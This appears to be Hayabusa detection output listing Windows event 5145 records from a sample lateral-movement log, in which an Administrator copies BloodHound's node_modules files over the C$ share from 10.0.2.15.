2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.design  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.dragNodes  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.edgeSiblings  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.filter  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.fullScreen  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.generators  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.keyboard  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.lasso  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.leaflet  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.legend  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.locate  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.neighborhoods  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.poweredBy  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.relativeSize  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.select  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.tooltips  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.customEdgeShapes  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.edgeLabels  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.glyphs  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.halo  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.linkurious  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.HITS  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.louvain  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\scripts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\captors  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\classes  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\middlewares  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\misc  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\renderers  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\utils  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\locate-path  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.968 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash\fp  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.978 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\loose-envify  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\make-dir  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\md5-file  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimatch  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\example  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\bin  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\examples  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\bin  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\dojo  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\jquery  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\mootools  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.028 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\qooxdoo  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache\wrappers\yui3  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\examples  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.038 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:25.048 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\neo4j-driver\lib\browser  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
